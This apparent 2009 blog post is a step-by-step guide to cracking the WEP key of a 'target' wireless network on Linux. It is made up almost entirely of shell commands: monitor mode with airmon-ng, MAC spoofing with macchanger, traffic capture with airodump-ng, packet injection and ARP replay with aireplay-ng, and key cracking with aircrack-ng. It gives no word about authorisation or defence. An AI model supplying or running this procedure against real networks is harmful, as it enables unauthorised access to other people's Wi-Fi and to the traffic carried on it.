Thursday, October 1, 2009

Hack WEP Guide using Linux

iwconfig
(stop the adapter by issuing)
airmon-ng stop ath0

airmon-ng start wifi0 ( monitor mode enabled)
ifconfig ath0 down
macchanger --mac 11:11:11:11:11:11 ath0
ifconfig ath0 up
airodump-ng ath0 ( now you must choose target , use ctrl+c to stop scanning )

(open new shell window or session)
(Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:)
(the command below will output to the file WEP123
airodump-ng -c [NUMBERofCHANNEL] -w WEP123 --bssid [BSSID] ath0

(open new shell window or session)
(Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:)
aireplay-ng -1 0 -a [bssid] -h 11:11:11:11:11:11 -e [ESSID] ath0
(open new shell window or session)
(If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:)
aireplay-ng -3 -b [BSSID] -h 11:11:11:11:11:11 ath0
(This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the "data" section filling up with packets.)
(After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:)
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 11:11:11:11:11:11 [device]

(If you gather about 15 000 packets (#Data) u can start aircrack, ofc usally it is not enough )
aircrack-ng -n 64 -b [BSSID] WEP123-01.cap
------------

No comments: